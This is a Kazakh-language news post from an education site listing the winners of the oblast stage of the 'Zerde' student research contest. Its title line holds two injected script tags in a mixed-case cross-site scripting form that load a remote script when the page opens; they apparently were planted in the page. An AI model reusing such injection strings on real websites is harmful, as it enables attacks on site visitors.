«ЗЕРДЕ»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

22.11.2024

⚜«ЗЕРДЕ» ХХ зерттеу жобалары байқауының 2-7 сынып оқушылары арасында үздік жұмыстар анықталды⚜

2024 жылғы 10 – 12 қараша аралығында Ақмола облысы білім басқармасының «Ақмола дарыны» дарынды балалар мен талантты жастарды анықтау және қолдау орталығының ұйымдастыруымен Көкшетау қаласы, Абай атындағы дарынды балаларға арналған № 3 облыстық мамандандырылған мектеп-интернатының базасында 2-7 сынып оқушылары арасында «Зерде» ХХ республикалық зерттеу жобалары байқауының облыстық кезеңі өткізілді.

Байқаудың мақсаты - балалардың зерттеу қызметінің дағдыларын дамыту, кіші және орта жастағы мектеп оқушыларының интеллектуалдық-шығармашылық әлеуетін ынталандыру болып табылады.

Байқаудың міндеттері – зерттеу жұмыстарына қызығушылық танытқан қабілетті және дарынды оқушыларды анықтау және оларға қолдау көрсету, оқушылардың үздік жетістіктерін бағалау және насихаттау, қоғамның интеллектуалдық әлеуетін дамыту мәселесіне көпшіліктің назарын аудару.

І орын - Пинчук Ксения, «Ақмола облысы білім басқармасының Астрахан ауданы бойынша білім бөлімі Новочеркасс ауылының жалпы орта білім беретін мектебі» КММ-нің 7-сынып оқушысы;
ІІІ орын - Рябоконь Арсений, Фогельзанг Ульяна, «Ақмола облысы білім басқармасының Астрахан ауданы бойынша білім бөлімі Жалтыр ауылының № 1 жалпы орта білім беретін мектебі» КММ-нің 6-сынып оқушылары;

Грамота - Бахтияр Нуркен, «Ақмола облысы білім басқармасының Астрахан ауданы бойынша білім бөлімі Астрахан ауылының № 1 жалпы орта білім беретін мектебі» КММ-нің 4-сынып оқушысы;

Сертификат - Карашина Камила, «Ақмола облысы білім басқармасының Астрахан ауданы бойынша білім бөлімі Жалтыр ауылының № 3 жалпы орта білім беретін мектебі» КММ-нің 4-сынып оқушысы.

Просмотров: 4798


Пікір қосу



Деректерді қолтаңбаға қосу